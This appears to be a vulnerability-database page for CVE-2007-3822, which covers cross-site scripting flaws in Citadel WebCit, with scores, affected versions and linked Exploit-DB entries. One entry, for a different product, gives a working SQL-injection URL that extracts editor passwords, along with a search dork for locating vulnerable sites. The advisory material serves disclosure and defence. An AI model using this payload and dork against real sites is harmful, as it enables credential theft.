CVE-2007-3822
published 2007-07-17CVE-2007-3822: Multiple cross-site scripting (XSS) vulnerabilities in Webcit before 7.11 allow remote attackers to inject arbitrary web script or HTML via (1) the who…
PriorityP413low2.6CVSS 2.0
AVNACHAuNCNIPAN
EXPLOIT
EPSS
2.48%
82.6th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Webcit before 7.11 allow remote attackers to inject arbitrary web script or HTML via (1) the who parameter to showuser; and other vectors involving (2) calendar mode, (3) bulletin board mode, (4) room names, and (5) uploaded file names.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citadel | webcit | <= 7.10 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting
exploitdb·2007-07-14
CVE-2007-3822 Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting
Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/24913/info
Citadel WebCit is prone to multiple input-validation vulnerabilities, including multiple HTML-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
Versions prior to WebCit 7.11 are vulnerable.
http://www.example.com/showuser?who=[xss]
Exploit-DB
Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection
exploitdb·2007-01-15
CVE-2007-0305 Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection
Okul Web Otomasyon Sistemi 4.0.1 - SQL Injection
---
AYYILDIZ.ORG PreSents...
Script: Okul Web Otomasyon Sistemi
Script Download: http://www.aspindir.com/Goster/3822
Contact: ilker Kandemir
DORK: inurl:etkinlikbak.asp
Exploit: etkinlikbak.asp?id=-1%20union%20select%200,editor,sifre,3,4,5%20from%20editor
Editor Panel: editor_gir.asp
Tnx:H0tturk,Dr.Max Virus,,PcDelisi,CodeR,Dumenci
Special Tnx:Asianeagle, AYYILDIZ.ORG
# milw0rm.com [2007-01-15]
No writeups or analysis indexed.
http://osvdb.org/38176http://osvdb.org/38177http://osvdb.org/38178http://osvdb.org/38179http://osvdb.org/38180http://secunia.com/advisories/26090http://securityreason.com/securityalert/2890http://www.securityfocus.com/archive/1/473714/100/0/threadedhttp://www.securityfocus.com/bid/24913https://exchange.xforce.ibmcloud.com/vulnerabilities/35433http://osvdb.org/38176http://osvdb.org/38177http://osvdb.org/38178http://osvdb.org/38179http://osvdb.org/38180http://secunia.com/advisories/26090http://securityreason.com/securityalert/2890http://www.securityfocus.com/archive/1/473714/100/0/threadedhttp://www.securityfocus.com/bid/24913https://exchange.xforce.ibmcloud.com/vulnerabilities/35433
2007-07-17
Published